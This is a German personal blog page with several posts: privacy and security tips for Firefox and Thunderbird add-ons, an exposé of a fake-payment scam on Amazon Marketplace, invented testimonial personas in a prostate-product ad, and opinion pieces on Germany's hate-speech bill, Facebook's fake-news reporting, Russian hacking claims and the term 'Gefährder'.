Ein Stückchen mehr Cyber Sicherheit…

Share Button

Hackerangriffe beinflussen Wahlen, Schadsoftware legt 100000 DSL- Anschlüsse lahm und Cyber- Kriminaliät nimmt ständig zu.

Horrorszenarien prägen die Medienberichterstattung bei Internet- Themen. Vieles davon läßt sich durch Medienkompetenz verhindern und noch einiges mehr mit den richtigen Werkzeugen. Wenn man  einige vermeintlich unverzichtbare gegen quasi adäquat gleichwertige austauscht und selbst etwas besser aufpasst, kann man manchem virtuellen Ungemach ausweichen.

Bei Windows- Betriebssystemen ist es ratsam, Produktivsysteme nicht mit adminstrativen Benutzerrechten zu verwenden. Das schützt mehr als alle Anti- Viren- Produkte zusammen. Ein aktuelles Patchlevel der installierten Programme und des Betriebssystems selbst sind eigentlich selbstverständlich. Mit ausreichend Medienkompetenz und den richtigen Konfigurationen kann kaum noch etwas passieren.

Die Wahl des Browsers ist bereits essentiell. Quelloffene Produkte wie der Mozilla Firefox sollten den Vorrang bekommen, denn damit ist ein unbemerktes Ausspähen von persönlichen Daten durch den Hersteller weitgehend ausgeschlossen. Schließlich kann man durch einige geschickte Eingriffe den Sicherheitsstandard noch erhöhen. Am Beispiel des Mozilla Firefox könnte das etwa so aussehen:

 

In den Firefox- Browser lassen sich etliche mehr oder weniger nützliche Zusatzprogramme (AddOns) installieren. Einige davon machten unrühmliche Schlagzeilen, weil sie eben entgegen ihrer ursprünglichen Funktion Datenspionage betrieben. World of Trust (WoT) wurde diesbezüglich entlarvt. Nach bestem Wissen und Gewissen und einer technischen Analyse werden hier nur AddOns verwendet, die nach derzeitigem Wissensstand keine Daten ohne Zustimmung des Benutzers sammeln.

Punkt 1:

 

FlagFox ist ein AddOn, welches optisch gleich anzeigt, wo sich der Server, auf welchem das aktuell besuchte Onlineangebot verwaltet wird, beheimatet ist. Es ist nicht ausgeschlossen, dass deutschsprachige Angebote auf ausländischen Servern gehostet werden. Dennoch ist es hilfreich, wenn man im Zweifel etwas genauer nachsehen kann. Beim Klick auf die Länderflagge werden umfangreiche Angaben zur besuchten Internetseite dargeboten. Es lässt sich damit feststellen, wer für die entsprechende Domain verantwortlich ist.  Man muss selbst entscheiden, inwieweit man die Internetseite als seriös betrachtet.

 

Google ist der uneingeschränkte Marktführer bei den Suchmaschinen. Allerdings ist Google auch gleichzeitig der größte Datensammler. Man kann das ignorieren oder aber Alternativen verwenden. Die Suchmaschine Startpage verwendet die Google- Datenbanken, aber versichert dem Nutzer, keine Daten zu sammeln und ihm Anonymität zu gewährleisten. Es gibt noch weitere Suchmaschinen, die ebenfalls datenschutzfreundlich ihre Dienste anbieten. Diese können bei den Sucheinstellungen des Firefox integriert werden. Will man keinesfalls auf Google verzichten, so sollte man wenigstens eine verschlüsselte Variante (https oder ssl) des Suchanbieters verwenden.

Punkt 3:

Quasi unbemerkt sammeln sogenannte Tracker, die als Programmcode in vielen Internetseiten versteckt sind, Daten der Besucher. Das geschieht völlig heimlich und ohne Zustimmung der Nutzer. Mit diesen Daten lassen sich umfangreiche Nutzer- und Bewegungsprofile erstellen. Ghostery verhindert diese Art der Datenspionage weitgehend. Man kann das Tool individuell einstellen und zur Funktionalität mancher Bereiche einzelne freischalten. Mit Zustimmung (Opt In Verfahren) werden Daten an den Hersteller versendet, damit einerseits neue Tracker einbezogen werden können und andererseits Drittanbietern die Information bereitgestellt wird, wo welche Tracker blockiert werden. Das ist dann im Prinzip auch eine Datensammlung, allerdings muss man daran nicht partizipieren und kann selbst darüber entscheiden.

 

Diverse Einstellungen erlauben dem Benutzer, als nützlich empfundene Tracker auch einzuschalten. So werden Facebook- Login oder Like- Buttons auf externen Internetseiten ebenfalls als Tracker identifiziert. Denn auch sie sammeln Daten. Es ist somit möglich, Sicherheit und Funktionalität individuell zu beeinflussen.

Punkt 4:

Eine Kalenderfunktion mit Termineingaben ist nützlich und auch hier bietet Google seine Dienste an. Allerdings steht für Google auch hierbei das eigene Geschäftsmodell im Vordergrund, auch wenn der Google- Kalender sehr bedienerfreundlich und umfangreich ist.

 

Als Alternative kann man das AddOn ReminderFox verwenden, was auch die Möglichkeit bietet, den Kalender mit anderen Leuten zu teilen. Das ist jedoch nicht so bequem wie beim Google- Kalender und auch nicht für Smartphones verfügbar, dennoch ein recht nützliches Tool, wenn man einen datenschutzfreundlichen sowie interaktiven Online- Kalender sucht.

Punkt 5:

Ähnlich wie FlagFox arbeitet auch das AddOn TCPIPUtils.

 

Man kann sich unter den beiden Tools nach eigenen Vorlieben das ansprechendere auswählen oder auch beide parallel verwenden.

Punkt 6:

Anonymisierung ist ein wesentlicher Bestandteil von sicherer Internetnutzung und ausgesprochen wichtig für Leute, die womöglich politisch verfolgt werden. Ungeachtet der jeweiligen Situation bietet anonymoX eine Vielzahl von Möglichkeiten, sich anonym in der virtuellen Welt zu bewegen, indem die eigene tatsächliche IP- Adresse durch eine andere ersetzt wird. Eine Rückverfolgung ist praktisch ausgeschlossen.

 

 

 

 

 

 

 

Weniger auf den eigenen Computer, sondern mehr auf den kompletten Internetanschluss zielt Shodan ab.

Eigentlich handelt es sich hierbei um eine spezielle Suchmaschine, die vorwiegend auf das „Internet of Things“ zugeschnitten ist und aufzeigt, wie gut oder schlecht das „Ziel“ gesichert ist. Offene Ports sind hierbei die essentiellen Schnittstellen. Ports, die nicht benötigt werden, sollten geschlossen werden. Smart Home Geräte, die bequem über UPnP am DSL- Router betrieben werden, können dadurch schnell zu Unsicherheitsfaktoren und Ziel für Hacker werden.

Dass auch immer noch gefälschte Emails Schadsoftware auf Computer installieren können oder zu falschen Handlungen motiviert von Betrügern führen, kann eigentlich ebenfalls weitreichend unterbunden werden.

Zunächst möchte ich an dieser Stelle eine merkwürdig klingende Frage stellen:

Wer hat bereits unglückliche Erfahrungen mit Schadsoftware machen müssen, obwohl mindestens eine Sicherheitssoftware installiert gewesen ist?

Wer diese Frage mit „Ja“ beantworten muss, muss gleichzeitig sein eigenes Sicherheitskonzept in Frage stellen. Was nützt ein Anti- Viren- Programm, wenn es nicht vor den Gefahren schützt, weshalb man es installiert hat? Zu Anfang des Artikels wurden einige wichtige Elemente eines praktikablen Sicherheitskonzeptes erwähnt. Anti- Viren- Software ist nicht völlig überflüssig, aber man darf sich auch keinesfalls darauf verlassen und in dem Glauben agieren, man sei vor Malware geschützt.

Nach wie vor sind gefälschte Emails ein adäquates Mittel, Computernutzer auszutricksen. Mozilla bietet mit dem Emailclient Thunderbird eine komfortable Lösung zum Verarbeiten von Emails. Und ein recht nützliches AddOn gibt es für diesen Emailclient.

MailHops zeigt ähnlich wie im Firefox das Tool Flagfox eine Länderflagge an, womit man schnell die tatsächliche Herkunft der Email feststellen kann. Egal wie echt die Fälschung auch wirken mag, es wird eher unwahrscheinlich sein, dass Amazon eine Bestellbestätigung aus Istanbul über den Umweg der Britischen Junferninseln versenden würde.

Sicherheit könnte so einfach sein…

FirefoxConfig

ThunderbirdConfig

Diese beiden Downloads konfigurieren bereits installierte Mozilla- Produkte so um, dass die hier vorgestellten Tools automatisch integriert werden. Existiert weder Firefox noch Thunderbird, installiert das jeweilige Tool die aktuell mit den Tools kompatible Version des Mozilla- Produktes. Auch veraltete Versionen von Browser oder Emailclient werden erkannt und auf die aktuell getestete Version hochgerüstet.  Bestehende Konfigurationen werden zuvor gesichert, falls man es vergessen haben sollte.

 

 

Share Button

„Hatespeech“ Gesetzentwurf von und mit Maas aber ohne Ziel

Share Button

Bundesjustizminister Heiko Maas (SPD) legt nun einen Gesetzentwurf vor, der Hass, Hetze und Falschmeldungen im Internet reglementieren soll.

So wie dieser Entwurf es vorsieht, wird dadurch die freie Meinungsäußerung nachhaltig beschnitten. Denn welcher Internetkonzern möchte schon 50 Millionen Euro Strafe zahlen, wenn man nicht den Vorgaben dieses Gesetzes Folge leistet?

Der Gesetzentwurf sieht vor, dass Beschwerden von Nutzern in sozialen Medien wie Facebook oder Twitter innerhalb von 24 Stunden juristisch bewertet und gegebenenfalls die beanstandeten Inhalte gelöscht werden. Ein solches Vorhaben als ambitioniert zu bezeichnen, ist im Vergleich zur üblichen Dauer von juristischen Auseinandersetzungen sogar noch untertrieben.

Zweifelsohne hat sich die Diskussionskultur im Internet in eine dramatisch bemitleidenswerte Richtung entwickelt.  Die Entscheidungsbefugnis unzähliger juristisch nicht eindeutiger Sachverhalte an Privatunternehmen zu übertragen, ist vermutlich sogar verfassungswidrig.  Anhand von einigen konkreten Fällen wird das deutlich:

Quelle: Facebook
Quelle: Facebook

Ist ein derartiger Kommentar nun bereits eine strafrelevante Beleidigung oder ein akzeptabler Ratschlag? Beurteilen sollen solche Fälle für Facebook zukünftig etwa 600 Mitarbeiter der Bertelsmann Tochter- Firma Arvato ohne juristische Ausbildung zu einem Gehalt knapp über dem gesetzlichen Mindestlohn.

Für nicht eindeutige Fälle haben die Bearbeiter immerhin nach Vorstellung von Bundesjustizminister Maas 7 Tage Zeit. Man benötigt allein bei Facebook keine 5 Minuten, um kritische Kommentare aufzuspüren. Man darf also davon ausgehen, dass jeder Mitarbeiter täglich hunderte Fälle zu bearbeiten haben wird.

Quelle: Facebook
Quelle: Facebook

Vermutlich ist diese Art der Beleidigung noch zu den harmlosen Äußerungen zu zählen?

Quelle: Facebook
Quelle: Facebook

 

Eine kleine Sammlung von Facebook- Kommentaren demonstriert, wie schwierig eine juristisch kompetente Einschätzung werden kann und wie weltfremd dieser Gesetzentwurf wirkt.

Sicher klingt es utopisch, dass jeder dieser Kommentare letztendlich auch juristisch verfolgt wird. Das würde die ohnehin überlasteten Justizbehörden ins Chaos stürzen. Es ist also eher davon auszugehen, dass eine Löschorgie einsetzen wird und auch viele Beiträge, die eigentlich nicht zu beanstanden sind, dieser Praxis zum Opfer fallen werden. Der Rechtsstaat löst sich damit auf…

 

 

 

Share Button

Geiz ist geil und kann trotzdem teuer werden!

Share Button

Innovationsmangel kann man Online- Betrügern wohl kaum vorwerfen. Ziemlich ausgefeilt und unter den Augen der Verantwortlichen bei Amazon treiben jene Betrüger ihr Spiel im Amazon Marketplace.

 

Amazon weißt zwar stets darauf hin, dass man Aufforderungen nach Bezahlmethoden außerhalb von Amazon nicht Folge leisten soll, dennoch werden derartig offensichtliche Betrugsversuche zugelassen. Im Anzeigefeld „Zustand“ steht für gewöhnlich entweder „neu“ oder „gebraucht“ bzw. noch so etwas wie „gebraucht, aber wie neu“, jedoch wenn dort eine Aufforderung zu finden ist, die dazu animiert, vor der regulären Kaufabwicklung eine ominöse Emailadresse zu kontaktieren, sollten die Alarmglocken klingen…

Tatsächlich funktioniert der generelle Amazon- Bestellprozess wie gewohnt, zumindest dem Anschein nach.

 

Allerdings erhält man eine gefälschte Email, die angeblich von Amazon stammen sollte, wenn man zuvor mit der angegebenen Emailadresse Kontakt aufgenommen hatte.

 

Die Emailadresse lautet in diesem Fall zahlungen@amazon-bestellen.net und ist so gestaltet, wie man es von Amazon her kennt. Allerdings handelt es sich nicht um eine offizielle Amazon- Emailadresse. Wie eine Analyse ergibt, hat diese Email einen umständlichen Weg über die Türkei und Tortola (Britische Jungferninseln) eingeschlagen. Das ist merkwürdig, wenn der europäische Unternehmenssitz von Amazon doch in Dublin (Irland) zu verorten ist. Der Text in schlechtem Deutsch sollte selbst den naivsten Schnäppchenjäger überzeugen, dass hierbei etwas faul sein muss.

 

Angeblich gab es nur einen einzigen Smart TV dieser Sorte beim Amazon– Marketplace- Händler X. Y GmbH, übrigens einer Firma für Stahl- und Apparatebau aus Baden- Württemberg, die kurioserweise auch Unterhaltungselektronikartikel zu unschlagbar günstigen Preisen anbieten soll. Jetzt erscheint das quasi gleiche Angebot bei einem anderen Händler (tRÄNENpALAST, Berlin), aber die gleiche ominöse Emailadresse (xcvx80@*web.de) erscheint im Feld „Zustand“.

Geht man nicht auf das Angebot ein, was ohnehin ein Fake ist, wird die Bestellung ohne Angabe von Gründen storniert.

 

Das geschieht dann offiziell über Amazon, womöglich durch den Shop- Betreiber. Es bleibt daher unklar, inwieweit der entsprechende Online- Shop in den Betrug involviert ist. Es besteht jedoch auch der begründete Verdacht, dass die Betrüger an die Zugangsdaten des entsprechenden Marketplace- Shop Betreibers gelangt sind und dessen Shop nun für den Betrug temporär missbrauchen. Demzufolge gehen viele Amazon– Marketplace Shop- Betreiber nicht sonderlich sorgfältig mit ihren Zugangsdaten um.

Ein Kontakt bei einem womöglich gekaperten Marketplace- Betreiber ergab, dass dieser über einem gehackten Amazon– Marketplace  Account klagte, aber dennoch keine juristischen Maßnahmen einleiten wollte.

Schließlich erhalten potentielle Kunden, die das perfide Spiel bis dahin mitgemacht haben, eine gefälschte Amazon– Email.

 

Man sollte sich dringend an den Hinweis von Amazon erinnern (siehe 1. Abbildung), dass man keine Zahlungen außerhalb von Amazon leisten soll. Das Konto gehört definitiv nicht Amazon, wie eine IBAN- Prüfung ergibt:

Quelle: https://www.iban-rechner.de/iban_validieren.html
Quelle: https://www.iban-rechner.de/iban_validieren.html

 

Und die Emailadresse des Absenders dieser gefälschten Amazon– Email lautet: bestellbestatigung@swsamazoncentral.com, also sicher nicht ein Amazon– Account.

Genau genommen sollten diese Recherche- Ergebnisse den Ermittlungsbehörden ausreichen, um die Betrüger aufspüren zu können, zumal Rumänien ein Mitgliedstaat der EU ist…

Share Button

Prostata – das Männerproblem

Share Button

Fake News gibt es offensichtlich nicht nur in der Politik, sondern auch die Pharmaindustrie befleißigt sich diverser Strategien, um oftmals nutzlose Medikamente gewinnbringend zu vermarkten.

Das üble Spiel mit dem Leiden von Patienten kann leider unter den Augen von Recht und Gesetz völlig ungeniert betrieben werden. Bei Männern gilt die Prostata (Vorsteherdrüse) als intimes Reizthema und eine der Hauptursachen für sexuelle Probleme. Es ist also kein Wunder, dass findige Unternehmer diese Umstände im wahrsten Sinne des Wortes schamlos ausnutzen.

Als ich per Facebook dann auch einmal eine Werbeanzeige über dieses heikle Thema in die Timeline gespült bekam, habe ich als älterer Herr Mitte 50 durchaus ein Interesse für das Thema entwickelt.

Quelle: https://www.facebook.com/permalink.php?story_fbid=406459733026957&id=395245700815027
Quelle: https://www.facebook.com/permalink.php?story_fbid=406459733026957&id=395245700815027

Ein selbst betroffener Herr schildert in einem Artikel seine überaus erfolgreichen Erfahrungen mit einem chinesischen urologischen Pflaster. Der Blogger Micheal Frost schwört auf die heilende Wirkung des Pflasters der Firma ProstaPlast bei der Behandlung seiner Prostatitis.

Etliche Kommentatoren stimmen augenscheinlich mit seiner Einschätzung überein. Nun geht es aber an dieser Stelle weniger um die Wirkung jenes Präparates, sondern um die dubiose Vermarktungsstrategie. Denn jener Blogger Michael Frost ist eine reine Kunstfigur der Marketingabteilung.

Quelle: http://www.male-health-method.com/de-prostaplast_b6/index.php?cid=MTQwMDQ3MjI5NSMxMDAwMDAzNDk4IzEwMDE1MjI1OSNHRVJNQU5ZI0JlcmxpbiMjIyMjIyMj
Quelle: http://www.male-health-method.com/de-prostaplast_b6/index.php?cid=MTQwMDQ3MjI5NSMxMDAwMDAzNDk4IzEwMDE1MjI1OSNHRVJNQU5ZI0JlcmxpbiMjIyMjIyMj

Denn möchte man mehr über den  ansonsten auskunftsfreudigen Autor erfahren, wird man auf die Internetpräsenz von ProstaPlast in Dallas (USA) geleitet. Die fiktive Gestalt Michael Frost besitzt je nach Nationalität stets ein passendes Pendant:

Hier erzählt Dragoslav Mika die gleiche Geschichte.  Und hier nennt er sich Vlad Bobea. Vom Foto her müssen es Klone sein, denn selbst eineiige Zwillinge können sich nicht so identisch sein. So findet man die Prostata- Stilikone auch als Mihael Novak sowie als Michal Horky, immer passend zum jeweiligen Land, wo er gerade virtuell gastiert. In Italien tritt er als Michele Fustari auf und in Frankreich nennt er sich Michael Froment. 

Wenn ein Unternehmen sein Produkt mit gefälschten Identitäten und deren erfundenen Lebensgeschichten bewerben muss, sollte man sich durchaus die Frage stellen, inwieweit der medizinische Aspekt überhaupt noch zutreffen kann.

Natürlich fehlt auch nicht ein fiktiver Mediziner, der das Produkt ProstaPlast in höchten Tönen empfiehlt.

Für den deutschen Sprachraum nennt er sich Dr. Benjamin Hubert. Man kann es sich ersparen, die Namen und Identitäten des nicht existiertenden Doktors durch die restlichen Länder zu ergründen…

 

Share Button

Wie man mit virtuellen Wattebällchen gegen FakeNews kämpft!

Share Button

Der politische Druck zwingt den Internet- Konzern Facebook gegen Falschmeldungen und Hetze im eigenen sozialen Netzwerk vorzugehen. Die Bundesregierung verlagert heikle juristische Sachverhalte regelrecht komplett in die Verantwortung eines privatwirtschaftlichen Unternehmens, welches selbst den Gesetzen anderer Staaten (USA, Irland) unterliegt. Facebook sucht derweil Unterstützung bei deutschen Journalisten und scheint hierbei eine Kooperation mit dem gemeinnützigen Recherchezentrum correctiv.org eingegangen zu sein.

Das Konzept sieht vor, dass Meldungen über sogenannte FakeNews an ein Recherche- Team übermittelt werden, welches diese Meldungen dann überprüfen soll. Als FakeNews entlarvte Meldungen werden nicht gelöscht, sondern sollen entsprechend markiert werden. Immerhin kann dann der Vorwurf von Zensur weitgehend vermieden werden. Allerdings erreichen potentiell als FakeNews beanstandete Meldungen erst ab einer nicht transparent definierten Anzahl die Prüfer. Das allein kann schon zur Schwachstelle werden, denn wer ohnehin nicht erkennt, dass man ihm eine Unwahrheit präsentiert und nicht einmal einen solchen Verdacht schöpft, wird wohl kaum eine solche Beanstandung an Facebook senden.

Technisch scheint das Konzept ebenfalls längst nicht ausgereift zu sein.

 

Es sollte meiner Meinung nach nicht auf Facebook sein.

Die Meldefunktion für FakeNews ist zunächst einmal dezent versteckt und selbst der Text verrät nicht wirklich, dass man damit Falschmeldungen beanstanden kann. Ein kleines graues Symbol im oberen rechten Eck eines jeden Statusbeitrags ermöglicht das Aufklappen eines Menüs, wo man unter anderem einen „Beitrag melden“ kann. Danach folgt der Nutzerdialog, der nicht immer eindeutig ist.

 

Im 3. Dialogfenster erhält man dann endlich den eindeutigen Hinweis, FakeNews anzeigen zu können. Leider erscheint nicht immer das gleiche Fenster und man erhält dann auch nicht die Möglichkeit, FakeNews melden zu können.

 

Unerklärlich bleibt demnach, warum die Möglichkeit des Anzeigens von FakeNews nicht immer zur Verfügung steht. Im Grunde könnte daraus wieder der Vorwurf einer Zensur abgeleitet werden.

 

Ansonsten verwirrt das darauffolgende Dialogfenster erheblich. Eigentlich kann man nur recht ineffektive Aktionen gegen FakeNews ausführen und nichts deutet darauf hin, dass man damit eine FakeNews auch abschließend beanstandet hat. In Tests haben etliche Leute an dieser Stelle abgebrochen, weil Ihnen nämlich keine der 3 angebotenen Varianten sinnvoll oder zweckdienlich erschien.

 

Wählt man die Möglichkeit, dem Verbreiter etwaiger FakeNews eine Nachricht zu senden, hat sich aus bisherigen Tests ergeben, dass die Adressaten nicht darauf reagieren. Wie und wo nun die Prüfer von correctiv.org aktiv werden, bleibt vorerst völlig unklar. Die bis jetzt als FakeNews gemeldeten Beiträge existieren in unveränderter Form und pflanzen sich ungestört durch das soziale Netzwerk fort.

Share Button

ForceNews: Die Logik des zerzausten Äffchens

Share Button

Als Falschmeldungen kann man die Berichte über russische Hackerangriffe, welche Wahlen in demokratischen Staaten manipulieren würden und wollten, nicht wirklich klassifizieren. Allerdings anstatt sie als FakeNews zu bezeichnen, würde der Anglizismus „ForceNews“ eher zutreffen. Diese Nachrichten sind nämlich keinesfalls falsch oder erfunden, aber in geballter Form werden Spekulationen wie Tatsachen behandelt, wobei die tatsächlich vorhandenen Fakten in vorgegebene Richtungen getrieben werden. Denn wenn man die Medienberichte zu den angeblichen Hackerangriffen, die die US- Wahl beeinflusst haben sollen, genauer betrachtet, sind eklatante Defizite in der tatsächlich vorhandenen Faktenbasis zu erkennen.

Russlands Präsident Wladimir Putin hat nach Einschätzung der amerikanischen Geheimdienste persönlich Cyber-Angriffe angeordnet, um die Wahlchancen des Republikaners Donald Trump zu erhöhen. Es könne „mit großer Sicherheit“ davon ausgegangen werden, dass Putin selbst hinter der Kampagne zur Beeinflussung der Wahl in Amerika stehe, hieß es in einem Bericht von CIA, FBI und NSA.

Quelle: FAZ

Der russische Präsident Wladimir Putin hat nach Einschätzung der US-Geheimdienste eine Kampagne angeordnet, um den Ausgang der amerikanischen Präsidentschaftswahl zu beeinflussen. Russland habe das Ziel verfolgt, die demokratische Kandidatin Hillary Clinton zu verunglimpfen und ihre Chancen auf einen Wahlsieg zu schmälern, heißt es in einem Bericht von NSA, FBI und CIA, der am Freitag veröffentlicht wurde.

Quelle: Zeit Online

Bemerkenswert übereinstimmend selbst in der Wortwahl sind die Berichte zu diesem Thema in fast allen Leitmedien. Beweise gibt es allerdings keine. Weil eben die Cyber- Angriffe im Code der Schadsoftware kyrillische Zeichen vorweisen, laut Meta- Daten die Herkunft auf russische Server verweist und die Struktur das Muster eines russischen Hackerkollektivs namens APT28 andeutet, wird unisono diese Annahme als nahezu erwiesen dargestellt.

Filtert man den erheblichen Anteil an Sensationsgeilheit und den voreilenden Gehorsam gegenüber amerikanischen Sicherheitsinstitutionen heraus, bleiben ernüchternde Sachverhalte übrig.

War nicht Hillary Clinton maßgeblich selbst dafür verantwortlich, dass sie leichtfertig in einer solch sensiblen Position dienstlichen Emailverkehr über private Mailserver absolvierte?

Wieso legen die amerikanischen Geheimdienste nicht jene Beweise vor, die angeblich den manipulativen Einfluss Russlands auf die US- Innenpolitik offenbaren?

Ganz bestimmt ist Wladimir Putin kein unschuldiger Chorknabe und nachweislich kein vorbildlicher Demokrat. Jedoch die Doktrin vom bösen Russen, der hinterhältig den kalten Krieg schleichend neu beleben will, wirkt geradezu verzweifelt, indem man eigene Fehler vertuschen möchte.

Es lohnt sich an dieser Stelle die Gedanken etwas in die jüngere Vergangenheit schweifen zu lassen, als ein gewisser Edward Snowden die Machenschaften der NSA und weiterer westlicher Geheimdiente aufdeckte und übrigens hierfür sogar unwiderlegbare Beweise vorlegen konnte.

Selbst das Abhören des Mobiltelefons von Bundeskanzlerin Merkel, was lediglich die Spitze des Eisbergs allumfassender Cyber- Spionage darstellte, konnte die Bundesregierung so aus der Fassung bringen wie die jetzt angenommene Bedrohung der Bundestagswahl 2017 durch russische Hackerangriffe. Der SPD- Fraktionsvorsitzende Thomas Oppermann äußerte sich vorbeugend panisch:

Gezielte Propaganda und Hackerangriffe aus dem Ausland werden eine große Herausforderung für den deutschen Wahlkampf sein.

Quelle: Focus Online

In IT- Fachkreisen werden solche spektakulären Horrorszenarien aus der virtuellen Welt deutlich entspannter betrachtet. Wie bereits beim mutmaßlichen Cyber- Angriff auf die Netzinfrastruktur (Parlakom)  des deutschen Bundestags hervorging, handelte es sich um Emailanhänge, die eine Malware beinhalteten. Solche verseuchten Emails erhalten täglich Millionen Internetnutzer. Zwar waren diese gefälschten Emails gezielt an Parlamentarier adressiert, aber simple Sicherheitskonzepte hätten diese recht banale Form einer Cyber- Attacke völlig belanglos werden lassen. Man könnte es auch mit einer Weisheit aus dem konventionellen Alltag umschreiben:

Wer im Regen steht und den Regenschirm nicht aufspannt, braucht sich nicht zu wundern, wenn man nass wird.

Nachrichten, welche also suggerieren, dass gewisse Umstände entsprechende Ereignisse hervorrufen könnten und diese Nachrichten massiv mit Spekulationen angereichert werden, deren  Gesamtinformationsgehalt nur einen minimalen Faktenanteil besitzt, sind keine FakeNews, sondern ForceNews.

Es existieren also einigermaßen schwammige Tatsachen zu einem Vorfall, worum eine Geschichte gebastelt wird, die mit den reinen Fakten kaum noch etwas zu tun hat. Ein hervorragendes Beispiel liefert der angebliche Cyber- Angriff auf die Telekom:

Auch bei der jüngsten Attacke auf die Telekom gibt es kaum Beweise. Aber es gibt zeitliche Zusammenhänge. Und die lassen den Schluss zu, dass solche Angriffe Teil der russischen Strategie sind.

Das war ein kleiner Warnschuss an Deutschland, nicht wahr? Ein digitaler Warnschuss ins Wohnzimmer, pünktlich zum ersten Advent, mit der Telekom als Boten. Eine kleine Aufmerksamkeit für all diejenigen, die den Internetangriff auf den Bundestag im September 2015, zwei Jahre vor der Bundestagswahl, nicht ernst genommen haben.

Quelle: Welt

Ziemlicher Unsinn ist das, was quasi alle Leitmedien damals zunächst über den Ausfall von ca. 900000 Internetroutern einiger Typen der Speedport- Reihe zu berichten hatten. Tatsächlich war es eine Nachlässigkeit der Telekom, die Geräte nicht ordnungsgemäß mit einem erforderlichen  Firmware- Update auszustatten. Es war ein üblicher, keineswegs zielgerichteter Angriff auf weltweit alle Geräte, die eine sogar lange bekannte Sicherheitslücke nicht geschlossen hatten. Die Routermodelle der Telekom waren eher zufällig betroffen. Dennoch wurde zunächst von staatlichen Institutionen und auch der Bundesregierung selbst die Mutmaßung über einen russischen Cyber- Angriff öffentlich kolportiert.
Sind solche Halbwahrheiten, welche bewusst oder auch unbewusst durch eigentlich als seriös geltende Medien verbreitet werden nun FakeNews? Oder sollte man nicht doch etwas mehr differenzieren?
Womöglich sind solche ForceNews noch gefährlicher als handfeste FakeNews, die als solche eindeutig widerlegt werden können.  Denn wie man erkennen kann, reden Politiker und Medien beim Telekom- Routerausfall sowie bei der Malware- Infektion von Bundestags- Computern immer noch von gezielten russischen Cyber- Angriffen…

 

 

Share Button

Wie gefährlich sind „Gefährder“

Share Button

Seit dem Terroranschlag auf einen Weihnachtsmarkt in Berlin kurz vor Weihnachten 2016, kursiert der Begriff „Gefährder“ durch die Medien und die sozialen Netze.

Nach dem Anschlag in Berlin haben Polizei und Verfassungsschutz auch in Hessen die Observation von islamistischen Gefährdern intensiviert.

Quelle: FAZ

In der Wikipedia wird der Begriff folgendermaßen erläutert:

Als Gefährder werden im Zusammenhang mit der öffentlichen Sicherheit und Gefahrenabwehr Personen bezeichnet, bei denen kein konkreter Hinweis vorliegt, dass sie eine Straftat planen, aber bei denen „bestimmte Tatsachen die Annahme der Polizeibehörden rechtfertigen, dass sie Straftaten von erheblicher Bedeutung, insbesondere solche im Sinne des § 100a der Strafprozessordnung (StPO), begehen“ werden. Die 2004 von der Arbeitsgemeinschaft der Leiter der Landeskriminalämter und des Bundeskriminalamts festgelegte Begriffsbestimmung ist nicht gesetzlich verankert.

Tatsächlich obliegt es demnach exekutiven Behörden, Menschen zu kategorisieren. Die Polizeibehörden der Länder in Zusammenarbeit mit den Landesämtern für Verfassungsschutz legen in Deutschland jeweils fest, wen sie als Gefährder einstufen. Es wird hierfür sogar beim BKA eine Liste geführt, die sogenannte „Datenbank Islamismus“ (DABIS). Etwa 550 Personen sollen derzeit auf dieser Liste (Stand 2016) stehen.

Wenn man nun die Pannenserie des Verfassungsschutzes bei den NSU- Morden betrachtet, darf man davon ausgehen, dass diese Liste weder vollständig sein kann, noch ist sicher zu behaupten, dass womöglich Leute ins Raster der Ermittler geraten sind, die eben keine Gefährder sind. Es ist eine willkürliche Zusammenstellung, freilich nach umfangreicher Abwägung.

In der TAZ wird der Begriff „Gefährder“ relativiert:

Eine offizielle Definition von „Gefährder“ gibt es nicht, der ehemalige Innenminister Hans-Peter Friedrich bezeichnete „Gefährder“ als „Personen, bei denen Tatsachen die Annahme rechtfertigen, dass sie erhebliche Straftaten begehen könnten“. Im juristischen Sinn hat der Begriff jedoch keinerlei Bedeutung, denn gegen einen „Gefährder“ liegen keine konkreten Hinweise vor, die für eine Anklage ausreichen. Es handelt sich also nicht einmal um Verdächtige, kurz gesagt: Es geht um Unschuldige. „Gefährder“ ist ein Neusprech-Neologismus von Innenministern, die gerne eines unserer wichtigsten rechtsstaatlichen Prinzipien unterhöhlen würden: Die Unschuldsvermutung. Der Begriff soll es möglich machen, Menschen, die nichts Strafbares getan haben, wie Kriminelle zu behandeln, und ist damit Teil einer sprachlichen Aufrüstung, die von Medienschaffenden nicht undifferenziert nachgeplappert werden sollte.

Der Begriff „Gefährder“ wird zu leichtfertig von Regierungsmitgliedern und auch Medienvertretern verwendet, ohne dass es dafür eine rechtliche Grundlage geben würde, Leute so zu bezeichnen. Es ist und bleibt eine Vermutung, wenngleich eine begründete. Durch die Verwendung des Begriffs wird allerdings suggeriert, dass die damit bezeichneten Personen Kriminelle oder gar Terroristen seien.

Bei Hunden gilt der Pitbull Terrier als gefährliche Hunderassen und ist in einer nicht einheitlichen Rasseliste der verschiedenen Bundesländer aufgelistet und darf nicht nach Deutschland eingeführt werden. So manchem Tier widerfährt Unrecht, hingegen wird pauschal Sicherheitsprophylaxe betrieben. So kann es auch auf Personen zutreffen, die in jener Gefährder- Liste aufgeführt werden, die sich ein Leben lang nichts zu Schulden haben kommen lassen und nicht einmal wissen, dass sie als Gefährder eingestuft sind.

Aber es gibt sogar Nachweise ausgerechnet vom Zentralrat der Muslime in Deutschland, dass man den deutschen Rechtsstaat offensichtlich nicht begriffen hat:

„Ich verstehe nicht, warum Menschen, die für den IS rekrutieren, nur beobachtet werden“, sagte Mazyek. Das gefährde „unsere Sicherheit“.

Quelle: FAZ

Sollte man die Errungenschaft der Unschuldsvermutung aufgeben und stattdessen wie in diktatorischen Strukturen, Leute, denen keine Schuld nachgewiesen werden kann, wegsperren? Es ist durchaus eine gesellschaftliche Belastungsprobe, als gefährlich anzusehende Personen Freiheit zu gestatten und sich darüber hinaus einer möglichen Gefahr auszusetzen. Müsste man nicht eher einen Ansatzpunkt finden, der die Gefahr minimiert oder im besten Fall ausschließt? Salafisten können sich auf eine weitere Errungenschaft einer freiheitlichen Gesellschaft berufen, die Meinungsfreiheit. Doch wenn selbst Autokennzeichen nicht speziell definierte Buchstaben- oder Zahlenkombinationen wie beispielsweise „SS“ tragen dürfen, klingt es beinahe grotesk, wenn extremistische Islamisten Menschen für radikale Ideologien begeistern und anwerben dürfen…

Share Button

Saarland Weihnachts- Challenge

Share Button

Der gemeine Saarländer besitzt in seiner evolutionsbiologischen Charakteristik eine gelassen gemütliche Grundkonstitution. Das ändert sich schlagartig mit Beginn der Adventszeit…

